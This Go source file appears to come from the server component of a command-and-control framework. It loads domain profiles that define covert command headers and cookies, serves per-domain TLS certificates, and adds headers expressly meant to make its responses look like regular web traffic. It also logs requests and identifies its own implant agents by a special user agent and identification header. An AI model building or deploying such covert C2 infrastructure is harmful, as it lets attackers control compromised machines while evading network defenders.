291 lines
8.3 KiB
Go
291 lines
8.3 KiB
Go
package main
|
|
|
|
import (
|
|
"crypto/tls"
|
|
"fmt"
|
|
"io/ioutil"
|
|
"log"
|
|
"net"
|
|
"net/http"
|
|
"path/filepath"
|
|
"strings"
|
|
"time"
|
|
|
|
"gopkg.in/yaml.v2"
|
|
)
|
|
|
|
// InitConfig initializes configuration from YAML file
|
|
func InitConfig() error {
|
|
if err := LoadConfigFromYAML("config.yaml"); err != nil {
|
|
return fmt.Errorf("failed to load configuration: %v", err)
|
|
}
|
|
|
|
// Validate that we have at least one domain configured
|
|
if len(config.DomainProfiles) == 0 {
|
|
return fmt.Errorf("no domain profiles configured")
|
|
}
|
|
|
|
// Validate mandatory fields for each domain
|
|
for domain, profile := range config.DomainProfiles {
|
|
if profile.SSL.CertFile == "" {
|
|
return fmt.Errorf("domain %s missing cert_file", domain)
|
|
}
|
|
if profile.SSL.KeyFile == "" {
|
|
return fmt.Errorf("domain %s missing key_file", domain)
|
|
}
|
|
if profile.CommandHeader == "" {
|
|
return fmt.Errorf("domain %s missing command_header_name", domain)
|
|
}
|
|
if profile.CommandHeaderValue == "" {
|
|
return fmt.Errorf("domain %s missing command_header_value", domain)
|
|
}
|
|
if profile.CommandCookie == "" {
|
|
return fmt.Errorf("domain %s missing command_cookie_name", domain)
|
|
}
|
|
if profile.MessageCookieName == "" {
|
|
return fmt.Errorf("domain %s missing message_cookie_name", domain)
|
|
}
|
|
if profile.BodyMessageHeader == "" {
|
|
return fmt.Errorf("domain %s missing body_message_header", domain)
|
|
}
|
|
if profile.BodyMessageHeaderValue == "" {
|
|
return fmt.Errorf("domain %s missing body_message_header_value", domain)
|
|
}
|
|
// Ensure web_content_path is an absolute path
|
|
if profile.WebContentPath != "" {
|
|
absPath, err := filepath.Abs(profile.WebContentPath)
|
|
if err != nil {
|
|
return fmt.Errorf("domain %s has invalid web_content_path: %v", domain, err)
|
|
}
|
|
profile.WebContentPath = absPath
|
|
config.DomainProfiles[domain] = profile
|
|
}
|
|
}
|
|
|
|
// Log loaded domains
|
|
domains := make([]string, 0, len(config.DomainProfiles))
|
|
for domain := range config.DomainProfiles {
|
|
domains = append(domains, domain)
|
|
}
|
|
log.Printf("Configuration loaded with %d domains: %v", len(domains), domains)
|
|
return nil
|
|
}
|
|
|
|
// LoadConfigFromYAML loads configuration from a YAML file
|
|
func LoadConfigFromYAML(filename string) error {
|
|
data, err := ioutil.ReadFile(filename)
|
|
if err != nil {
|
|
return fmt.Errorf("failed to read config file: %v", err)
|
|
}
|
|
|
|
err = yaml.Unmarshal(data, &config)
|
|
if err != nil {
|
|
return fmt.Errorf("failed to parse YAML config: %v", err)
|
|
}
|
|
|
|
return nil
|
|
}
|
|
|
|
// createTLSConfig creates a TLS configuration with certificates for configured domains
|
|
func createTLSConfig() (*tls.Config, error) {
|
|
var certificates []tls.Certificate
|
|
certMap := make(map[string]*tls.Certificate)
|
|
|
|
// Load certificates for each configured domain
|
|
for domain, profile := range config.DomainProfiles {
|
|
if profile.SSL.CertFile == "" || profile.SSL.KeyFile == "" {
|
|
return nil, fmt.Errorf("domain %s missing SSL certificate configuration", domain)
|
|
}
|
|
|
|
cert, err := tls.LoadX509KeyPair(profile.SSL.CertFile, profile.SSL.KeyFile)
|
|
if err != nil {
|
|
return nil, fmt.Errorf("failed to load certificate for domain %s: %v", domain, err)
|
|
}
|
|
|
|
certificates = append(certificates, cert)
|
|
certMap[domain] = &cert
|
|
log.Printf("Loaded SSL certificate for domain %s: %s", domain, profile.SSL.CertFile)
|
|
}
|
|
|
|
if len(certificates) == 0 {
|
|
return nil, fmt.Errorf("no valid SSL certificates found")
|
|
}
|
|
|
|
tlsConfig := &tls.Config{
|
|
Certificates: certificates,
|
|
GetCertificate: func(clientHello *tls.ClientHelloInfo) (*tls.Certificate, error) {
|
|
serverName := clientHello.ServerName
|
|
// Check if we have a certificate for this exact domain
|
|
if cert, exists := certMap[serverName]; exists {
|
|
return cert, nil
|
|
}
|
|
// Domain not configured - reject the connection
|
|
return nil, fmt.Errorf("domain %s is not configured", serverName)
|
|
},
|
|
}
|
|
|
|
return tlsConfig, nil
|
|
}
|
|
|
|
// Add domain-specific headers to maintain appearance of regular web traffic
|
|
func addDomainHeaders(w http.ResponseWriter, profile DomainProfile) {
|
|
// Create a copy of headers to modify
|
|
headers := make(map[string]string)
|
|
for k, v := range profile.Headers {
|
|
headers[k] = v
|
|
}
|
|
|
|
// Update dynamic headers
|
|
currentTime := time.Now().UTC()
|
|
|
|
// Common headers that need dynamic values
|
|
headers["date"] = currentTime.Format(time.RFC1123)
|
|
|
|
// Domain-specific dynamic headers
|
|
if _, exists := headers["expires"]; exists {
|
|
expireTime := currentTime.Add(1 * time.Hour)
|
|
headers["expires"] = expireTime.Format(time.RFC1123)
|
|
}
|
|
|
|
// Handle set-cookie header
|
|
if cookieHeader, exists := headers["set-cookie"]; exists {
|
|
// Split multiple cookies (e.g., "test1=some_cookie_stuff; test2=some_cookie")
|
|
cookies := strings.Split(cookieHeader, ";")
|
|
for _, cookie := range cookies {
|
|
cookie = strings.TrimSpace(cookie)
|
|
if cookie == "" {
|
|
continue
|
|
}
|
|
// Split cookie into name and value (e.g., "test1=some_cookie_stuff")
|
|
parts := strings.SplitN(cookie, "=", 2)
|
|
if len(parts) != 2 {
|
|
log.Printf("Invalid cookie format in set-cookie: %s\n", cookie)
|
|
continue
|
|
}
|
|
name := strings.TrimSpace(parts[0])
|
|
value := strings.TrimSpace(parts[1])
|
|
http.SetCookie(w, &http.Cookie{
|
|
Name: name,
|
|
Value: value,
|
|
Path: "/",
|
|
Expires: time.Now().Add(24 * time.Hour),
|
|
})
|
|
}
|
|
}
|
|
|
|
// Set all headers except set-cookie (already handled)
|
|
for name, value := range headers {
|
|
if name != "set-cookie" && value != "" {
|
|
w.Header().Set(name, value)
|
|
}
|
|
}
|
|
}
|
|
|
|
// These was created in order to track response state
|
|
// If body was written - wroteBody becomes true and thus normal content is not served
|
|
// But this requres all "w" (http.ResponseWriter) passing changed to "ri"
|
|
// Not sure if this good way to go
|
|
type responseInterceptor struct {
|
|
http.ResponseWriter
|
|
wroteBody bool
|
|
}
|
|
|
|
func (ri *responseInterceptor) Write(b []byte) (int, error) {
|
|
ri.wroteBody = true
|
|
return ri.ResponseWriter.Write(b)
|
|
}
|
|
|
|
func (ri *responseInterceptor) HeaderWritten() bool {
|
|
return ri.wroteBody
|
|
}
|
|
|
|
// Log all incoming request details to both file and console
|
|
func logRequest(r *http.Request) {
|
|
// Format basic request info
|
|
logEntry := fmt.Sprintf("Request: %s %s from IP: %s\n", r.Method, r.URL.Path, r.RemoteAddr)
|
|
|
|
// Log User-Agent
|
|
logEntry += fmt.Sprintf("User-Agent: %s\n", r.UserAgent())
|
|
|
|
// Log all headers
|
|
logEntry += "Headers:\n"
|
|
for name, values := range r.Header {
|
|
logEntry += fmt.Sprintf(" %s: %s\n", name, strings.Join(values, ", "))
|
|
}
|
|
|
|
// Log cookies
|
|
if len(r.Cookies()) > 0 {
|
|
logEntry += "Cookies:\n"
|
|
for _, cookie := range r.Cookies() {
|
|
logEntry += fmt.Sprintf(" %s: %s\n", cookie.Name, cookie.Value)
|
|
}
|
|
}
|
|
|
|
logEntry += "-----------------------\n"
|
|
|
|
// Also log a simplified version to console
|
|
log.Printf("%s %s from %s (UA: %s)\n", r.Method, r.URL.Path, r.RemoteAddr, shortenUserAgent(r.UserAgent()))
|
|
log.Print(logEntry)
|
|
}
|
|
|
|
// GetDomainProfile returns the profile for a domain
|
|
func GetDomainProfile(domain string) (DomainProfile, bool) {
|
|
profile, exists := config.DomainProfiles[domain]
|
|
return profile, exists
|
|
}
|
|
|
|
// getDomainList returns a list of configured domains for logging
|
|
func getDomainList() []string {
|
|
var domains []string
|
|
for domain := range config.DomainProfiles {
|
|
domains = append(domains, domain)
|
|
}
|
|
return domains
|
|
}
|
|
|
|
// extractDomain extracts the domain from the Host header, removing port if present
|
|
func extractDomain(host string) string {
|
|
// Split host and port
|
|
domain, _, err := net.SplitHostPort(host)
|
|
if err != nil {
|
|
// If SplitHostPort fails, it might be because there's no port
|
|
// In that case, return the original host
|
|
return host
|
|
}
|
|
return domain
|
|
}
|
|
|
|
// Helper function to decode UTF-16 bytes to UTF-8 string
|
|
func decodeUTF16(b []byte) (string, error) {
|
|
if len(b)%2 != 0 {
|
|
return "", fmt.Errorf("invalid UTF-16 byte length: %d", len(b))
|
|
}
|
|
// Convert UTF-16 bytes to runes
|
|
runes := make([]rune, len(b)/2)
|
|
for i := 0; i < len(b)/2; i++ {
|
|
runes[i] = rune(b[2*i]) | rune(b[2*i+1])<<8
|
|
}
|
|
// Trim null terminator and convert to string
|
|
return strings.TrimRight(string(runes), "\x00"), nil
|
|
}
|
|
|
|
// Shorten user agent for console display
|
|
func shortenUserAgent(ua string) string {
|
|
if len(ua) > 30 {
|
|
return ua[:27] + "..."
|
|
}
|
|
return ua
|
|
}
|
|
|
|
// Identify if the request is from our agent
|
|
func IdentifyAgent(r *http.Request) bool {
|
|
// Check for our specific user agent
|
|
if !strings.Contains(r.UserAgent(), config.C2AgentUserAgent) {
|
|
return false
|
|
}
|
|
|
|
// Check for our identification header and value
|
|
headerValue := r.Header.Get(config.C2IdentificationHeader)
|
|
return headerValue == config.C2IdentificationValue
|
|
}
|